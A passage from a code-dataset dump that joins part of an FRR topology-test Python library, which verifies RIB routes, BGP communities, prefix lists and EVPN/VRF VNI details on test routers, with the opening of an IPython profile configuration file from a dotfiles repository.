"advertise_networks": [{"start_ip": "20.0.0.0/32",
"no_of_network": 10},
{"start_ip": "30.0.0.0/32"}]
}}
# Verifying ipv4 routes in router r1 learned via BGP
dut = "r2"
protocol = "bgp"
result = verify_rib(tgen, "ipv4", dut, input_dict, protocol = protocol)
Returns
-------
errormsg(str) or True
"""
logger.info("Entering lib API: verify_rib()")
router_list = tgen.routers()
additional_nexthops_in_required_nhs = []
found_hops = []
for routerInput in input_dict.keys():
for router, rnode in router_list.iteritems():
if router != dut:
continue
logger.info("Checking router %s RIB:", router)
# Verifying RIB routes
if addr_type == "ipv4":
command = "show ip route"
else:
command = "show ipv6 route"
found_routes = []
missing_routes = []
if "static_routes" in input_dict[routerInput]:
static_routes = input_dict[routerInput]["static_routes"]
for static_route in static_routes:
if "vrf" in static_route and static_route["vrf"] is not None:
logger.info(
"[DUT: {}]: Verifying routes for VRF:"
" {}".format(router, static_route["vrf"])
)
cmd = "{} vrf {}".format(command, static_route["vrf"])
else:
cmd = "{}".format(command)
if protocol:
cmd = "{} {}".format(cmd, protocol)
cmd = "{} json".format(cmd)
rib_routes_json = run_frr_cmd(rnode, cmd, isjson=True)
# Verifying output dictionary rib_routes_json is not empty
if bool(rib_routes_json) is False:
errormsg = "No route found in rib of router {}..".format(router)
return errormsg
network = static_route["network"]
if "no_of_ip" in static_route:
no_of_ip = static_route["no_of_ip"]
else:
no_of_ip = 1
if "tag" in static_route:
_tag = static_route["tag"]
else:
_tag = None
# Generating IPs for verification
ip_list = generate_ips(network, no_of_ip)
st_found = False
nh_found = False
for st_rt in ip_list:
st_rt = str(ipaddress.ip_network(unicode(st_rt)))
_addr_type = validate_ip_address(st_rt)
if _addr_type != addr_type:
continue
if st_rt in rib_routes_json:
st_found = True
found_routes.append(st_rt)
if fib and next_hop:
if type(next_hop) is not list:
next_hop = [next_hop]
for mnh in range(0, len(rib_routes_json[st_rt])):
if (
"fib"
in rib_routes_json[st_rt][mnh]["nexthops"][0]
):
found_hops.append(
[
rib_r["ip"]
for rib_r in rib_routes_json[st_rt][
mnh
]["nexthops"]
]
)
if found_hops[0]:
missing_list_of_nexthops = set(
found_hops[0]
).difference(next_hop)
additional_nexthops_in_required_nhs = set(
next_hop
).difference(found_hops[0])
if additional_nexthops_in_required_nhs:
logger.info(
"Nexthop "
"%s is not active for route %s in "
"RIB of router %s\n",
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
errormsg = (
"Nexthop {} is not active"
" for route {} in RIB of router"
" {}\n".format(
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
)
return errormsg
else:
nh_found = True
elif next_hop and fib is None:
if type(next_hop) is not list:
next_hop = [next_hop]
found_hops = [
rib_r["ip"]
for rib_r in rib_routes_json[st_rt][0]["nexthops"]
]
if found_hops:
missing_list_of_nexthops = set(
found_hops
).difference(next_hop)
additional_nexthops_in_required_nhs = set(
next_hop
).difference(found_hops)
if additional_nexthops_in_required_nhs:
logger.info(
"Missing nexthop %s for route"
" %s in RIB of router %s\n",
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
errormsg = (
"Nexthop {} is Missing for "
"route {} in RIB of router {}\n".format(
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
)
return errormsg
else:
nh_found = True
if tag:
if "tag" not in rib_routes_json[st_rt][0]:
errormsg = (
"[DUT: {}]: tag is not"
" present for"
" route {} in RIB \n".format(dut, st_rt)
)
return errormsg
if _tag != rib_routes_json[st_rt][0]["tag"]:
errormsg = (
"[DUT: {}]: tag value {}"
" is not matched for"
" route {} in RIB \n".format(dut, _tag, st_rt,)
)
return errormsg
if metric is not None:
if "metric" not in rib_routes_json[st_rt][0]:
errormsg = (
"[DUT: {}]: metric is"
" not present for"
" route {} in RIB \n".format(dut, st_rt)
)
return errormsg
if metric != rib_routes_json[st_rt][0]["metric"]:
errormsg = (
"[DUT: {}]: metric value "
"{} is not matched for "
"route {} in RIB \n".format(dut, metric, st_rt,)
)
return errormsg
else:
missing_routes.append(st_rt)
if nh_found:
logger.info(
"[DUT: {}]: Found next_hop {} for all bgp"
" routes in RIB".format(router, next_hop)
)
if len(missing_routes) > 0:
errormsg = "[DUT: {}]: Missing route in RIB, " "routes: {}".format(
dut, missing_routes
)
return errormsg
if found_routes:
logger.info(
"[DUT: %s]: Verified routes in RIB, found" " routes are: %s\n",
dut,
found_routes,
)
continue
if "bgp" in input_dict[routerInput]:
if (
"advertise_networks"
not in input_dict[routerInput]["bgp"]["address_family"][addr_type][
"unicast"
]
):
continue
found_routes = []
missing_routes = []
advertise_network = input_dict[routerInput]["bgp"]["address_family"][
addr_type
]["unicast"]["advertise_networks"]
# Continue if there are no network advertise
if len(advertise_network) == 0:
continue
for advertise_network_dict in advertise_network:
if "vrf" in advertise_network_dict:
cmd = "{} vrf {} json".format(command, static_route["vrf"])
else:
cmd = "{} json".format(command)
rib_routes_json = run_frr_cmd(rnode, cmd, isjson=True)
# Verifying output dictionary rib_routes_json is not empty
if bool(rib_routes_json) is False:
errormsg = "No route found in rib of router {}..".format(router)
return errormsg
start_ip = advertise_network_dict["network"]
if "no_of_network" in advertise_network_dict:
no_of_network = advertise_network_dict["no_of_network"]
else:
no_of_network = 1
# Generating IPs for verification
ip_list = generate_ips(start_ip, no_of_network)
st_found = False
nh_found = False
for st_rt in ip_list:
st_rt = str(ipaddress.ip_network(unicode(st_rt)))
_addr_type = validate_ip_address(st_rt)
if _addr_type != addr_type:
continue
if st_rt in rib_routes_json:
st_found = True
found_routes.append(st_rt)
if next_hop:
if type(next_hop) is not list:
next_hop = [next_hop]
count = 0
for nh in next_hop:
for nh_dict in rib_routes_json[st_rt][0]["nexthops"]:
if nh_dict["ip"] != nh:
continue
else:
count += 1
if count == len(next_hop):
nh_found = True
else:
errormsg = (
"Nexthop {} is Missing"
" for route {} in "
"RIB of router {}\n".format(next_hop, st_rt, dut)
)
return errormsg
else:
missing_routes.append(st_rt)
if nh_found:
logger.info(
"Found next_hop {} for all routes in RIB"
" of router {}\n".format(next_hop, dut)
)
if len(missing_routes) > 0:
errormsg = (
"Missing {} route in RIB of router {}, "
"routes: {} \n".format(addr_type, dut, missing_routes)
)
return errormsg
if found_routes:
logger.info(
"Verified {} routes in router {} RIB, found"
" routes are: {}\n".format(addr_type, dut, found_routes)
)
logger.info("Exiting lib API: verify_rib()")
return True
def verify_admin_distance_for_static_routes(tgen, input_dict):
"""
API to verify admin distance for static routes as defined in input_dict/
input JSON by running show ip/ipv6 route json command.
Parameter
---------
* `tgen` : topogen object
* `input_dict`: having details like - for which router and static routes
admin dsitance needs to be verified
Usage
-----
# To verify admin distance is 10 for prefix 10.0.20.1/32 having next_hop
10.0.0.2 in router r1
input_dict = {
"r1": {
"static_routes": [{
"network": "10.0.20.1/32",
"admin_distance": 10,
"next_hop": "10.0.0.2"
}]
}
}
result = verify_admin_distance_for_static_routes(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
for static_route in input_dict[router]["static_routes"]:
addr_type = validate_ip_address(static_route["network"])
# Command to execute
if addr_type == "ipv4":
command = "show ip route json"
else:
command = "show ipv6 route json"
show_ip_route_json = run_frr_cmd(rnode, command, isjson=True)
logger.info(
"Verifying admin distance for static route %s" " under dut %s:",
static_route,
router,
)
network = static_route["network"]
next_hop = static_route["next_hop"]
admin_distance = static_route["admin_distance"]
route_data = show_ip_route_json[network][0]
if network in show_ip_route_json:
if route_data["nexthops"][0]["ip"] == next_hop:
if route_data["distance"] != admin_distance:
errormsg = (
"Verification failed: admin distance"
" for static route {} under dut {},"
" found:{} but expected:{}".format(
static_route,
router,
route_data["distance"],
admin_distance,
)
)
return errormsg
else:
logger.info(
"Verification successful: admin"
" distance for static route %s under"
" dut %s, found:%s",
static_route,
router,
route_data["distance"],
)
else:
errormsg = (
"Static route {} not found in "
"show_ip_route_json for dut {}".format(network, router)
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def verify_prefix_lists(tgen, input_dict):
"""
Running "show ip prefix-list" command and verifying given prefix-list
is present in router.
Parameters
----------
* `tgen` : topogen object
* `input_dict`: data to verify prefix lists
Usage
-----
# To verify pf_list_1 is present in router r1
input_dict = {
"r1": {
"prefix_lists": ["pf_list_1"]
}}
result = verify_prefix_lists("ipv4", input_dict, tgen)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
# Show ip prefix list
show_prefix_list = run_frr_cmd(rnode, "show ip prefix-list")
# Verify Prefix list is deleted
prefix_lists_addr = input_dict[router]["prefix_lists"]
for addr_type in prefix_lists_addr:
if not check_address_types(addr_type):
continue
for prefix_list in prefix_lists_addr[addr_type].keys():
if prefix_list in show_prefix_list:
errormsg = (
"Prefix list {} is/are present in the router"
" {}".format(prefix_list, router)
)
return errormsg
logger.info(
"Prefix list %s is/are not present in the router" " from router %s",
prefix_list,
router,
)
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
@retry(attempts=2, wait=4, return_is_str=True, initial_wait=2)
def verify_route_maps(tgen, input_dict):
"""
Running "show route-map" command and verifying given route-map
is present in router.
Parameters
----------
* `tgen` : topogen object
* `input_dict`: data to verify prefix lists
Usage
-----
# To verify rmap_1 and rmap_2 are present in router r1
input_dict = {
"r1": {
"route_maps": ["rmap_1", "rmap_2"]
}
}
result = verify_route_maps(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
# Show ip route-map
show_route_maps = rnode.vtysh_cmd("show route-map")
# Verify route-map is deleted
route_maps = input_dict[router]["route_maps"]
for route_map in route_maps:
if route_map in show_route_maps:
errormsg = "Route map {} is not deleted from router" " {}".format(
route_map, router
)
return errormsg
logger.info(
"Route map %s is/are deleted successfully from" " router %s",
route_maps,
router,
)
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
@retry(attempts=3, wait=4, return_is_str=True)
def verify_bgp_community(tgen, addr_type, router, network, input_dict=None):
"""
API to veiryf BGP large community is attached in route for any given
DUT by running "show bgp ipv4/6 {route address} json" command.
Parameters
----------
* `tgen`: topogen object
* `addr_type` : ip type, ipv4/ipv6
* `dut`: Device Under Test
* `network`: network for which set criteria needs to be verified
* `input_dict`: having details like - for which router, community and
values needs to be verified
Usage
-----
networks = ["200.50.2.0/32"]
input_dict = {
"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"
}
result = verify_bgp_community(tgen, "ipv4", dut, network, input_dict=None)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
if router not in tgen.routers():
return False
rnode = tgen.routers()[router]
logger.debug(
"Verifying BGP community attributes on dut %s: for %s " "network %s",
router,
addr_type,
network,
)
for net in network:
cmd = "show bgp {} {} json".format(addr_type, net)
show_bgp_json = rnode.vtysh_cmd(cmd, isjson=True)
logger.info(show_bgp_json)
if "paths" not in show_bgp_json:
return "Prefix {} not found in BGP table of router: {}".format(net, router)
as_paths = show_bgp_json["paths"]
found = False
for i in range(len(as_paths)):
if (
"largeCommunity" in show_bgp_json["paths"][i]
or "community" in show_bgp_json["paths"][i]
):
found = True
logger.info(
"Large Community attribute is found for route:" " %s in router: %s",
net,
router,
)
if input_dict is not None:
for criteria, comm_val in input_dict.items():
show_val = show_bgp_json["paths"][i][criteria]["string"]
if comm_val == show_val:
logger.info(
"Verifying BGP %s for prefix: %s"
" in router: %s, found expected"
" value: %s",
criteria,
net,
router,
comm_val,
)
else:
errormsg = (
"Failed: Verifying BGP attribute"
" {} for route: {} in router: {}"
", expected value: {} but found"
": {}".format(criteria, net, router, comm_val, show_val)
)
return errormsg
if not found:
errormsg = (
"Large Community attribute is not found for route: "
"{} in router: {} ".format(net, router)
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def verify_create_community_list(tgen, input_dict):
"""
API is to verify if large community list is created for any given DUT in
input_dict by running "sh bgp large-community-list {"comm_name"} detail"
command.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: having details like - for which router, large community
needs to be verified
Usage
-----
input_dict = {
"r1": {
"large-community-list": {
"standard": {
"Test1": [{"action": "PERMIT", "attribute":\
""}]
}}}}
result = verify_create_community_list(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
logger.info("Verifying large-community is created for dut %s:", router)
for comm_data in input_dict[router]["bgp_community_lists"]:
comm_name = comm_data["name"]
comm_type = comm_data["community_type"]
show_bgp_community = run_frr_cmd(
rnode, "show bgp large-community-list {} detail".format(comm_name)
)
# Verify community list and type
if comm_name in show_bgp_community and comm_type in show_bgp_community:
logger.info(
"BGP %s large-community-list %s is" " created", comm_type, comm_name
)
else:
errormsg = "BGP {} large-community-list {} is not" " created".format(
comm_type, comm_name
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def verify_cli_json(tgen, input_dict):
"""
API to verify if JSON is available for clis
command.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: CLIs for which JSON needs to be verified
Usage
-----
input_dict = {
"edge1":{
"cli": ["show evpn vni detail", show evpn rmac vni all]
}
}
result = verify_cli_json(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
for cli in input_dict[dut]["cli"]:
logger.info(
"[DUT: %s]: Verifying JSON is available for " "CLI %s :", dut, cli
)
test_cli = "{} json".format(cli)
ret_json = rnode.vtysh_cmd(test_cli, isjson=True)
if not bool(ret_json):
errormsg = "CLI: %s, JSON format is not available" % (cli)
return errormsg
elif "unknown" in ret_json or "Unknown" in ret_json:
errormsg = "CLI: %s, JSON format is not available" % (cli)
return errormsg
else:
logger.info(
"CLI : %s JSON format is available: " "\n %s", cli, ret_json
)
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
@retry(attempts=2, wait=4, return_is_str=True, initial_wait=2)
def verify_evpn_vni(tgen, input_dict):
"""
API to verify evpn vni details using "show evpn vni detail json"
command.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: having details like - for which router, evpn details
needs to be verified
Usage
-----
input_dict = {
"edge1":{
"vni": [
{
"75100":{
"vrf": "RED",
"vxlanIntf": "vxlan75100",
"localVtepIp": "120.1.1.1",
"sviIntf": "br100"
}
}
]
}
}
result = verify_evpn_vni(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying evpn vni details :", dut)
cmd = "show evpn vni detail json"
evpn_all_vni_json = run_frr_cmd(rnode, cmd, isjson=True)
if not bool(evpn_all_vni_json):
errormsg = "No output for '{}' cli".format(cmd)
return errormsg
if "vni" in input_dict[dut]:
for vni_dict in input_dict[dut]["vni"]:
found = False
vni = vni_dict["name"]
for evpn_vni_json in evpn_all_vni_json:
if "vni" in evpn_vni_json:
if evpn_vni_json["vni"] != int(vni):
continue
for attribute in vni_dict.keys():
if vni_dict[attribute] != evpn_vni_json[attribute]:
errormsg = (
"[DUT: %s] Verifying "
"%s for VNI: %s [FAILED]||"
", EXPECTED : %s "
" FOUND : %s"
% (
dut,
attribute,
vni,
vni_dict[attribute],
evpn_vni_json[attribute],
)
)
return errormsg
else:
found = True
logger.info(
"[DUT: %s] Verifying"
" %s for VNI: %s , "
"Found Expected : %s ",
dut,
attribute,
vni,
evpn_vni_json[attribute],
)
if evpn_vni_json["state"] != "Up":
errormsg = (
"[DUT: %s] Failed: Verifying"
" State for VNI: %s is not Up" % (dut, vni)
)
return errormsg
else:
errormsg = (
"[DUT: %s] Failed:"
" VNI: %s is not present in JSON" % (dut, vni)
)
return errormsg
if found:
logger.info(
"[DUT %s]: Verifying VNI : %s "
"details and state is Up [PASSED]!!",
dut,
vni,
)
return True
else:
errormsg = (
"[DUT: %s] Failed:" " vni details are not present in input data" % (dut)
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return False
@retry(attempts=2, wait=4, return_is_str=True, initial_wait=2)
def verify_vrf_vni(tgen, input_dict):
"""
API to verify vrf vni details using "show vrf vni json"
command.
Parameters
----------
* `tgen`: topogen object
* `input_dict`: having details like - for which router, evpn details
needs to be verified
Usage
-----
input_dict = {
"edge1":{
"vrfs": [
{
"RED":{
"vni": 75000,
"vxlanIntf": "vxlan75100",
"sviIntf": "br100",
"routerMac": "00:80:48:ba:d1:00",
"state": "Up"
}
}
]
}
}
result = verify_vrf_vni(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying vrf vni details :", dut)
cmd = "show vrf vni json"
vrf_all_vni_json = run_frr_cmd(rnode, cmd, isjson=True)
if not bool(vrf_all_vni_json):
errormsg = "No output for '{}' cli".format(cmd)
return errormsg
if "vrfs" in input_dict[dut]:
for vrfs in input_dict[dut]["vrfs"]:
for vrf, vrf_dict in vrfs.items():
found = False
for vrf_vni_json in vrf_all_vni_json["vrfs"]:
if "vrf" in vrf_vni_json:
if vrf_vni_json["vrf"] != vrf:
continue
for attribute in vrf_dict.keys():
if vrf_dict[attribute] == vrf_vni_json[attribute]:
found = True
logger.info(
"[DUT %s]: VRF: %s, "
"verifying %s "
", Found Expected: %s "
"[PASSED]!!",
dut,
vrf,
attribute,
vrf_vni_json[attribute],
)
else:
errormsg = (
"[DUT: %s] VRF: %s, "
"verifying %s [FAILED!!] "
", EXPECTED : %s "
", FOUND : %s"
% (
dut,
vrf,
attribute,
vrf_dict[attribute],
vrf_vni_json[attribute],
)
)
return errormsg
else:
errormsg = "[DUT: %s] VRF: %s " "is not present in JSON" % (
dut,
vrf,
)
return errormsg
if found:
logger.info(
"[DUT %s] Verifying VRF: %s " " details [PASSED]!!",
dut,
vrf,
)
return True
else:
errormsg = (
"[DUT: %s] Failed:" " vrf details are not present in input data" % (dut)
)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return False
| gpl-2.0 | -3,059,218,530,192,539,600 | 33.986071 | 96 | 0.456985 | false |
npotts/dotfiles | ipython/profile_default/ipython_config.py | 1 | 38662 | c = get_config()
# NEVER NAG ME
c.TerminalInteractiveShell.confirm_exit = False
# Configuration file for ipython.
# ------------------------------------------------------------------------------
# InteractiveShellApp(Configurable) configuration
# ------------------------------------------------------------------------------
## A Mixin for applications that start InteractiveShell instances.
#
# Provides configurables for loading extensions and executing files as part of
# configuring a Shell environment.
#
# The following methods should be called by the :meth:`initialize` method of the
# subclass:
#
# - :meth:`init_path`
# - :meth:`init_shell` (to be implemented by the subclass)
# - :meth:`init_gui_pylab`
# - :meth:`init_extensions`
# - :meth:`init_code`
## Execute the given command string.
# Default: ''
# c.InteractiveShellApp.code_to_run = ''
## Run the file referenced by the PYTHONSTARTUP environment variable at IPython
# startup.
# Default: True
# c.InteractiveShellApp.exec_PYTHONSTARTUP = True
## List of files to run at IPython startup.
# Default: []
# c.InteractiveShellApp.exec_files = []
## lines of code to run at IPython startup.
# Default: []
# c.InteractiveShellApp.exec_lines = []
## A list of dotted module names of IPython extensions to load.
# Default: []
# c.InteractiveShellApp.extensions = []
## dotted module name of an IPython extension to load.
# Default: ''
# c.InteractiveShellApp.extra_extension = ''
## A file to be run
# Default: ''
# c.InteractiveShellApp.file_to_run = ''
## Enable GUI event loop integration with any of ('asyncio', 'glut', 'gtk',
# 'gtk2', 'gtk3', 'osx', 'pyglet', 'qt', 'qt4', 'qt5', 'tk', 'wx', 'gtk2',
# 'qt4').
# Choices: any of ['asyncio', 'glut', 'gtk', 'gtk2', 'gtk3', 'osx', 'pyglet', 'qt', 'qt4', 'qt5', 'tk', 'wx', 'gtk2', 'qt4'] (case-insensitive) or None
# Default: None
# c.InteractiveShellApp.gui = None
## Should variables loaded at startup (by startup files, exec_lines, etc.) be
# hidden from tools like %who?
# Default: True
# c.InteractiveShellApp.hide_initial_ns = True
## If True, IPython will not add the current working directory to sys.path. When
# False, the current working directory is added to sys.path, allowing imports of
# modules defined in the current directory.
# Default: False
# c.InteractiveShellApp.ignore_cwd = False
## Configure matplotlib for interactive use with the default matplotlib backend.
# Choices: any of ['auto', 'agg', 'gtk', 'gtk3', 'inline', 'ipympl', 'nbagg', 'notebook', 'osx', 'pdf', 'ps', 'qt', 'qt4', 'qt5', 'svg', 'tk', 'widget', 'wx'] (case-insensitive) or None
# Default: None
# c.InteractiveShellApp.matplotlib = None
## Run the module as a script.
# Default: ''
# c.InteractiveShellApp.module_to_run = ''
## Pre-load matplotlib and numpy for interactive use, selecting a particular
# matplotlib backend and loop integration.
# Choices: any of ['auto', 'agg', 'gtk', 'gtk3', 'inline', 'ipympl', 'nbagg', 'notebook', 'osx', 'pdf', 'ps', 'qt', 'qt4', 'qt5', 'svg', 'tk', 'widget', 'wx'] (case-insensitive) or None
# Default: None
# c.InteractiveShellApp.pylab = None
## If true, IPython will populate the user namespace with numpy, pylab, etc. and
# an ``import *`` is done from numpy and pylab, when using pylab mode.
#
# When False, pylab mode should not import any names into the user namespace.
# Default: True
# c.InteractiveShellApp.pylab_import_all = True
## Reraise exceptions encountered loading IPython extensions?
# Default: False
# c.InteractiveShellApp.reraise_ipython_extension_failures = False
# ------------------------------------------------------------------------------
# Application(SingletonConfigurable) configuration
# ------------------------------------------------------------------------------
## This is an application.
## The date format used by logging formatters for %(asctime)s
# Default: '%Y-%m-%d %H:%M:%S'
# c.Application.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
# Default: '[%(name)s]%(highlevel)s %(message)s'
# c.Application.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
# Choices: any of [0, 10, 20, 30, 40, 50, 'DEBUG', 'INFO', 'WARN', 'ERROR', 'CRITICAL']
# Default: 30
# c.Application.log_level = 30
## Instead of starting the Application, dump configuration to stdout
# Default: False
# c.Application.show_config = False
## Instead of starting the Application, dump configuration to stdout (as JSON)
# Default: False
# c.Application.show_config_json = False
# ------------------------------------------------------------------------------
# BaseIPythonApplication(Application) configuration
# ------------------------------------------------------------------------------
## IPython: an enhanced interactive Python shell.
## Whether to create profile dir if it doesn't exist
# Default: False
# c.BaseIPythonApplication.auto_create = False
## Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# Default: False
# c.BaseIPythonApplication.copy_config_files = False
## Path to an extra config file to load.
#
# If specified, load this config file in addition to any other IPython config.
# Default: ''
# c.BaseIPythonApplication.extra_config_file = ''
## The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This option can also be specified through the environment
# variable IPYTHONDIR.
# Default: ''
# c.BaseIPythonApplication.ipython_dir = ''
## The date format used by logging formatters for %(asctime)s
# See also: Application.log_datefmt
# c.BaseIPythonApplication.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
# See also: Application.log_format
# c.BaseIPythonApplication.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
# See also: Application.log_level
# c.BaseIPythonApplication.log_level = 30
## Whether to overwrite existing config files when copying
# Default: False
# c.BaseIPythonApplication.overwrite = False
## The IPython profile to use.
# Default: 'default'
# c.BaseIPythonApplication.profile = 'default'
## Instead of starting the Application, dump configuration to stdout
# See also: Application.show_config
# c.BaseIPythonApplication.show_config = False
## Instead of starting the Application, dump configuration to stdout (as JSON)
# See also: Application.show_config_json
# c.BaseIPythonApplication.show_config_json = False
## Create a massive crash report when IPython encounters what may be an internal
# error. The default is to append a short message to the usual traceback
# Default: False
# c.BaseIPythonApplication.verbose_crash = False
# ------------------------------------------------------------------------------
# TerminalIPythonApp(BaseIPythonApplication, InteractiveShellApp) configuration
# ------------------------------------------------------------------------------
## Execute the given command string.
# See also: InteractiveShellApp.code_to_run
# c.TerminalIPythonApp.code_to_run = ''
## Whether to install the default config files into the profile dir.
# See also: BaseIPythonApplication.copy_config_files
# c.TerminalIPythonApp.copy_config_files = False
## Whether to display a banner upon starting IPython.
# Default: True
# c.TerminalIPythonApp.display_banner = True
## Run the file referenced by the PYTHONSTARTUP environment
# See also: InteractiveShellApp.exec_PYTHONSTARTUP
# c.TerminalIPythonApp.exec_PYTHONSTARTUP = True
## List of files to run at IPython startup.
# See also: InteractiveShellApp.exec_files
# c.TerminalIPythonApp.exec_files = []
## lines of code to run at IPython startup.
# See also: InteractiveShellApp.exec_lines
# c.TerminalIPythonApp.exec_lines = []
## A list of dotted module names of IPython extensions to load.
# See also: InteractiveShellApp.extensions
# c.TerminalIPythonApp.extensions = []
## Path to an extra config file to load.
# See also: BaseIPythonApplication.extra_config_file
# c.TerminalIPythonApp.extra_config_file = ''
## dotted module name of an IPython extension to load.
# See also: InteractiveShellApp.extra_extension
# c.TerminalIPythonApp.extra_extension = ''
## A file to be run
# See also: InteractiveShellApp.file_to_run
# c.TerminalIPythonApp.file_to_run = ''
## If a command or file is given via the command-line, e.g. 'ipython foo.py',
# start an interactive shell after executing the file or command.
# Default: False
# c.TerminalIPythonApp.force_interact = False
## Enable GUI event loop integration with any of ('asyncio', 'glut', 'gtk',
# 'gtk2', 'gtk3', 'osx', 'pyglet', 'qt', 'qt4', 'qt5', 'tk', 'wx', 'gtk2',
# 'qt4').
# See also: InteractiveShellApp.gui
# c.TerminalIPythonApp.gui = None
## Should variables loaded at startup (by startup files, exec_lines, etc.)
# See also: InteractiveShellApp.hide_initial_ns
# c.TerminalIPythonApp.hide_initial_ns = True
## If True, IPython will not add the current working directory to sys.path.
# See also: InteractiveShellApp.ignore_cwd
# c.TerminalIPythonApp.ignore_cwd = False
## Class to use to instantiate the TerminalInteractiveShell object. Useful for
# custom Frontends
# Default: 'IPython.terminal.interactiveshell.TerminalInteractiveShell'
# c.TerminalIPythonApp.interactive_shell_class = 'IPython.terminal.interactiveshell.TerminalInteractiveShell'
##
# See also: BaseIPythonApplication.ipython_dir
# c.TerminalIPythonApp.ipython_dir = ''
## The date format used by logging formatters for %(asctime)s
# See also: Application.log_datefmt
# c.TerminalIPythonApp.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
# See also: Application.log_format
# c.TerminalIPythonApp.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
# See also: Application.log_level
# c.TerminalIPythonApp.log_level = 30
## Configure matplotlib for interactive use with
# See also: InteractiveShellApp.matplotlib
# c.TerminalIPythonApp.matplotlib = None
## Run the module as a script.
# See also: InteractiveShellApp.module_to_run
# c.TerminalIPythonApp.module_to_run = ''
## Whether to overwrite existing config files when copying
# See also: BaseIPythonApplication.overwrite
# c.TerminalIPythonApp.overwrite = False
## The IPython profile to use.
# See also: BaseIPythonApplication.profile
# c.TerminalIPythonApp.profile = 'default'
## Pre-load matplotlib and numpy for interactive use,
# See also: InteractiveShellApp.pylab
# c.TerminalIPythonApp.pylab = None
## If true, IPython will populate the user namespace with numpy, pylab, etc.
# See also: InteractiveShellApp.pylab_import_all
# c.TerminalIPythonApp.pylab_import_all = True
## Start IPython quickly by skipping the loading of config files.
# Default: False
# c.TerminalIPythonApp.quick = False
## Reraise exceptions encountered loading IPython extensions?
# See also: InteractiveShellApp.reraise_ipython_extension_failures
# c.TerminalIPythonApp.reraise_ipython_extension_failures = False
## Instead of starting the Application, dump configuration to stdout
# See also: Application.show_config
# c.TerminalIPythonApp.show_config = False
## Instead of starting the Application, dump configuration to stdout (as JSON)
# See also: Application.show_config_json
# c.TerminalIPythonApp.show_config_json = False
## Create a massive crash report when IPython encounters what may be an
# See also: BaseIPythonApplication.verbose_crash
# c.TerminalIPythonApp.verbose_crash = False
# ------------------------------------------------------------------------------
# InteractiveShell(SingletonConfigurable) configuration
# ------------------------------------------------------------------------------
## An enhanced, interactive shell for Python.
## 'all', 'last', 'last_expr' or 'none', 'last_expr_or_assign' specifying which
# nodes should be run interactively (displaying output from expressions).
# Choices: any of ['all', 'last', 'last_expr', 'none', 'last_expr_or_assign']
# Default: 'last_expr'
# c.InteractiveShell.ast_node_interactivity = 'last_expr'
## A list of ast.NodeTransformer subclass instances, which will be applied to
# user input before code is run.
# Default: []
# c.InteractiveShell.ast_transformers = []
## Automatically run await statement in the top level repl.
# Default: True
# c.InteractiveShell.autoawait = True
## Make IPython automatically call any callable object even if you didn't type
# explicit parentheses. For example, 'str 43' becomes 'str(43)' automatically.
# The value can be '0' to disable the feature, '1' for 'smart' autocall, where
# it is not applied if there are no more arguments on the line, and '2' for
# 'full' autocall, where all callable objects are automatically called (even if
# no arguments are present).
# Choices: any of [0, 1, 2]
# Default: 0
# c.InteractiveShell.autocall = 0
## Autoindent IPython code entered interactively.
# Default: True
# c.InteractiveShell.autoindent = True
## Enable magic commands to be called without the leading %.
# Default: True
# c.InteractiveShell.automagic = True
## The part of the banner to be printed before the profile
# Default: "Python 3.8.6 (default, Sep 25 2020, 09:36:53) \nType 'copyright', 'credits' or 'license' for more information\nIPython 7.18.1 -- An enhanced Interactive Python. Type '?' for help.\n"
